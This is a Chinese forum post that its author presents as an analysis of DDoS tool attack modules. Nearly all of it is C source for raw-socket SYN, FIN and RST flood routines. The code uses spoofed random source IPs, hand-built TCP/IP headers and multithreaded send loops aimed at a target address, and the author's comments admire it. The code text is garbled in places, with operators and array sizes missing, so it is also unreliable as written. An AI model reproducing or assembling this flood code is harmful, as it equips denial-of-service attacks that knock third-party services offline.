
【原创】对现有的所能找到的DDOS代码(攻击模块)做出一次分析-SYN篇作 者: alalmn时 间: 2009-10-04,02:03链 接: /showthread.php?t=98896/=对现有的所能找到的DDOS代码(攻击模块)做出一次分析-SYN篇分析者:alalmn飞龙 BLOG:/alalmn分析的不好请各位高手见谅花了几个小时分析的呵呵SYN洪水攻击syn flood(SYN洪水攻击)介绍 /alalmn/blog/item/56d5d81f234fae00304e15e8.htmlTcpHeader.th_flag = 2; /0,2,4,8,16,32-FIN,SYN,RST,PSH,ACK,URG /SYN 标志我们可以不可以改变这个值 2是SYN攻击 改成16变成ACK攻击这样可以吗我刚才还在想这个问题 暴风DDOSVIP2010-225源代码.h 源码里就已经写到了呵呵爽啊暴风DDOSVIP2010-225源代码.h SYN(流量) 我觉得写得非常好真的个人看法QQ:316118740/=冷风的.htypedef struct tcphdr /定义TCP首部USHORT th_sport; /16位源端口USHORT th_dport; /16位目的端口unsigned int th_seq; /32位序列号unsigned int th_ack; /32位确认号unsigned char th_lenres; /4位首部长度+6位保留字中的4位unsigned char th_flag; /2位保留字+6位标志位USHORT th_win; /16位窗口大小USHORT th_sum; /16位校验和USHORT th_urp; /16位紧急数据偏移量TCP_HEADER;typedef struct _iphdr /ip头 unsigned char h_verlen; /4位首部长度+4位IP版本号 unsigned char tos; /8位服务类型TOS unsigned short total_len; /16位总长度(字节) unsigned short ident; /16位标识 unsigned short frag_and_flags; /3位标志位 unsigned char ttl; /8位生存时间TTL unsigned char proto; /8位协议号(TCP, UDP 或其他) unsigned short checksum; /16位IP首部校验和 unsigned int sourceIP; /32位源IP地址 unsigned int destIP; /32位目的IP地址 IP_HEADER;typedef struct tsd_hdr /定义TCP伪首部 unsigned long saddr; /源地址 unsigned long daddr; /目的地址 char mbz; char ptcl; /协议类型unsigned short tcpl; /TCP长度 PSD_HEADER;/计算校验和USHORT checksum(USHORT *buffer,int size)unsigned long cksum=0;while (size1)cksum+=*buffer+;size-=sizeof(USHORT);if (size)cksum+=*(UCHAR*)buffer;cksum = (cksum 16) + (cksum & 0xffff); cksum += (cksum 16); return (USHORT)(cksum);/*SYN FLOOD*/unsigned long CALLBACK SynFloodFunction(LPVOID dParam) /SYN攻击SOCKET sendSocket; /套接字SOCKADDR_IN Sin; /IP信息结构IP_HEADER ipHeader;TCP_HEADER tcpHeader; PSD_HEADER psdHeader; char szSendBuf1024 = ;if(sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED) = INVALID_SOCKET) /创建一个与指定传送服务提供者捆绑的套接口 /INVALID_SOCKET发生错误printf(Socket Setup Error.n); /插口设定错误 return 0; BOOL flag=1; if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, 
(char *)&flag, sizeof(flag) = SOCKET_ERROR) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误 printf(Setsockopt IP_HDRINCL Error.n); /Setsockopt IP_HDRINCL错误 return 0; int timeout = 3000; if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout) = SOCKET_ERROR) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误 printf(Setsockopt SO_SNDTIMEO Error.n); /Setsockopt SO_SNDTIMEO错误 return 0; Sin.sin_family = AF_INET; /sin_family 地址家族(必须是AF_INET)Sin.sin_port=htons(DdosPort); /目标端口号(使用网络字节顺序)Sin.sin_addr.S_un.S_addr=resolve(DdosUrl); /目标IP地址char src_ip20 = 0;while(!StopDDosAttack) /是否在攻击状态wsprintf( src_ip, %d.%d.%d.%d, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 ); /格式化字符串 伪造IP/填充IP首部 ipHeader.h_verlen = (44 | sizeof(ipHeader)/sizeof(unsigned long); /高四位IP版本号,低四位首部长度 ipHeader.tos = 0; ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader); /16位总长度(字节) ipHeader.ident = 1; /16位标识 ipHeader.frag_and_flags = 0x40; /3位标志位 ipHeader.ttl = 128; /8位生存时间TTL ipHto = IPPROTO_TCP; /8位协议(TCP,UDP) ipHeader.checksum = 0; /16位IP首部校验和ipHeader.sourceIP = inet_addr(src_ip); /伪IP 伪装自己的IPipHeader.destIP = Sin.sin_addr.s_addr; /目标地址/填充TCP首部 tcpHeader.th_sport = htons( 12121 ); /源端口号 tcpHeader.th_dport = htons( DdosPort ); /目标端口tcpHeader.th_seq = htonl( rand()%900000000 + 1 ); /SYN序列号tcpHeader.th_ack = 0; /ACK序列号置为0 tcpHeader.th_lenres = (sizeof(tcpHeader)/4FIN,SYN,RST,PSH,ACK,URGtcpHeader.th_win = htons(512); /窗口大小tcpHeader.th_sum = 0; /校验tcpHeader.th_urp = 0; /紧急数据偏移量/填充TCP伪首部(用于计算校验和,并不真正发送) psdHeader.saddr = ipHeader.sourceIP; /伪IP 伪装自己的IPpsdHeader.daddr = ipHeader.destIP; /目标地址psdHeader.mbz = 0; psdHeader.ptcl = IPPROTO_TCP; /协议类型psdHeader.tcpl = htons(sizeof(tcpHeader); /TCP长度/计算TCP校验和 /计算TCP校验和,计算校验和时需要包括TCP pseudo header memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) ); memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) ); tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );/计算IP检验和 memcpy( 
szSendBuf, &ipHeader, sizeof(ipHeader) ); memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) ); memset( szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), 0, 4 ); /内存空间初始化ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) ); /填充发送缓冲区memcpy( szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) ); /填充发送缓冲区for(int a=0;a1)cksum+=*buffer+;size -=sizeof(USHORT);if(size)cksum += *(UCHAR*)buffer;cksum = (cksum 16) + (cksum & 0xffff);cksum += (cksum 16);return (USHORT)(cksum);/*-*/void finattack() /Fin(流量)srand(unsigned) time(NULL); WSADATA wsaData;WSAStartup(MAKEWORD(2, 2), &wsaData);SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44;char SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); if( SendSocket = INVALID_SOCKET ) return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) return;SOCKADDR_IN Sin;Sin.sin_family = AF_INET; Sin.sin_port = tgtPort; Sin.sin_addr.s_addr = inet_addr(tgtIP);ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); ip_header.ident = 1; ip_header.frag_and_flags = 0x40; ip_header.ttl = rand()%256; ip_to = IPPROTO_TCP; ip_header.checksum = 0; ip_header.sourceIP = inet_addr(rawip); ip_header.destIP = inet_addr(tgtIP);tcp_header.th_sport = htons( rand()%60000 + 1 );tcp_header.th_dport = htons( tgtPort ); tcp_header.th_seq = htonl( rand()%900000000 + 1 ); tcp_header.th_ack = 0; tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URG 这个地方不一样tcp_header.th_win = htons(512); tcp_header.th_sum = 0; tcp_header.th_urp = 0;psd_header.saddr = 
ip_header.sourceIP; psd_header.daddr = ip_header.destIP; psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; psd_header.tcpl = htons(sizeof(tcp_header);memcpy(SendBuff,&psd_header,sizeof(psd_header); memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header); tcp_header.th_sum=checksum(USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header); memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header); memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4); ip_header.checksum=checksum(USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header);memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header);while (1)if (StopFlag = 1)ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_ntoa(in);elsestrcpy(tgtIP,ip);port=tgtPort;time=timeout;if (StopFlag = -1)return;StopFlag=-1;for(z=0;zxc;z+)hz=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)finattack, NULL, 0, NULL);if(timeout!=0)CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);/*-*/void rstattack() /伪造RST协议(流量)srand(unsigned) time(NULL); WSADATA wsaData;WSAStartup(MAKEWORD(2, 2), &wsaData);SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44;char SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); if( SendSocket = INVALID_SOCKET ) return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) return;SOCKADDR_IN Sin;Sin.sin_family = AF_INET; Sin.sin_port = tgtPort; Sin.sin_addr.s_addr = inet_addr(tgtIP);ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); ip_header.ident = 1; 
ip_header.frag_and_flags = 0x40; ip_header.ttl = rand()%256; ip_to = IPPROTO_TCP; ip_header.checksum = 0; ip_header.sourceIP = inet_addr(rawip); ip_header.destIP = inet_addr(tgtIP);tcp_header.th_sport = htons( rand()%60000 + 1 );tcp_header.th_dport = htons( tgtPort ); tcp_header.th_seq = htonl( rand()%900000000 + 1 ); tcp_header.th_ack = 0; tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URG 这个地方不一样tcp_header.th_win = htons(512); tcp_header.th_sum = 0; tcp_header.th_urp = 0;psd_header.saddr = ip_header.sourceIP; psd_header.daddr = ip_header.destIP; psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; psd_header.tcpl = htons(sizeof(tcp_header);memcpy(SendBuff,&psd_header,sizeof(psd_header); memcpy(SendBuff+sizeof(psd_header),&tcp_header,sizeof(tcp_header); tcp_header.th_sum=checksum(USHORT*)SendBuff,sizeof(psd_header)+sizeof(tcp_header); memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header, sizeof(tcp_header); memset(SendBuff+sizeof(ip_header)+sizeof(tcp_header),0,4); ip_header.checksum=checksum(USHORT*)SendBuff,sizeof(ip_header)+sizeof(tcp_header);memcpy(SendBuff,&ip_header,sizeof(ip_header); memcpy(SendBuff+sizeof(ip_header),&tcp_header,sizeof(tcp_header);while (1)if (StopFlag = 1)ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_ntoa(in);elsestrcpy(tgtIP,ip);port=tgtPort;time=timeout;if (StopFlag = -1)return;StopFlag=-1;for(z=0;zxc;z+)hz=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)rstattack, NULL, 0, NULL);if(timeout!=0)CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)wait_for_end, NULL, 0, NULL);/*-*/void synattack() /SYN(流量)srand(unsigned) time(NULL); WSADATA wsaData; /这个结构被用来存储 被WSAStartup函数调用后返回的 Windows Sockets 数据WSAStartup(MAKEWORD(2, 2), &wsaData); /确定SOCKET版本SOCKET SendSocket; IP_HEADER ip_header; TCP_HEADER tcp_header; PSD_HEADER psd_header;char rawip20=44; /默认伪IPchar SendBuff100;SendSocket = WSASocket( AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED ); 
/创建一个与指定传送服务提供者捆绑的套接口if( SendSocket = INVALID_SOCKET ) /INVALID_SOCKET发生错误return;BOOL Flag = TRUE; if( setsockopt(SendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&Flag, sizeof(Flag) = SOCKET_ERROR ) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误return;int Timeout = 5000; if ( setsockopt(SendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *) &Timeout, sizeof(Timeout) = SOCKET_ERROR ) /设置套接口的选项 设置发送和接收的超时 /SOCKET_ERROR创建错误return;SOCKADDR_IN Sin; /IP信息结构Sin.sin_family = AF_INET; /sin_family 地址家族(必须是AF_INET)Sin.sin_port = tgtPort; /目标端口号(使用网络字节顺序)Sin.sin_addr.s_addr = inet_addr(tgtIP); /目标IP地址ip_header.h_verlen = (44 | sizeof(ip_header)/sizeof(unsigned long); /高四位IP版本号,低四位首部长度 ip_header.tos = 0; ip_header.total_len = htons(sizeof(ip_header)+sizeof(tcp_header); /16位总长度(字节) ip_header.ident = 1; /16位标识 ip_header.frag_and_flags = 0x40; /3位标志位ip_header.ttl = rand()%256; /8位生存时间TTL ip_to = IPPROTO_TCP; /8位协议(TCP,UDP) ip_header.checksum = 0; /16位IP首部校验和ip_header.sourceIP = inet_addr(rawip); /伪IP 伪装自己的IPip_header.destIP = inet_addr(tgtIP); /目标地址/填充TCP首部 tcp_header.th_sport = htons( rand()%60000 + 1 ); /源端口号 目标端口 随机产生呵呵很好很高很绝tcp_header.th_dport = htons( tgtPort ); /目标端口tcp_header.th_seq = htonl( rand()%900000000 + 1 ); /SYN序列号tcp_header.th_ack = 0; /ACK序列号置为0tcp_header.th_lenres = (sizeof(tcp_header)/4FIN,SYN,RST,PSH,ACK,URGtcp_header.th_win = htons(512); /窗口大小tcp_header.th_sum = 0; /校验tcp_header.th_urp = 0; /紧急数据偏移量/填充TCP伪首部(用于计算校验和,并不真正发送) psd_header.saddr = ip_header.sourceIP; /伪IP 伪装自己的IPpsd_header.daddr = ip_header.destIP; /目标地址psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; /协议类型psd_header.tcpl = htons(sizeof(tcp_header); /TCP长度while (1)if (StopFlag = 1) /判断攻击状态ExitThread(0);return;for(int a=0;ah_addr, hp-h_length);strcpy(tgtIP,inet_n
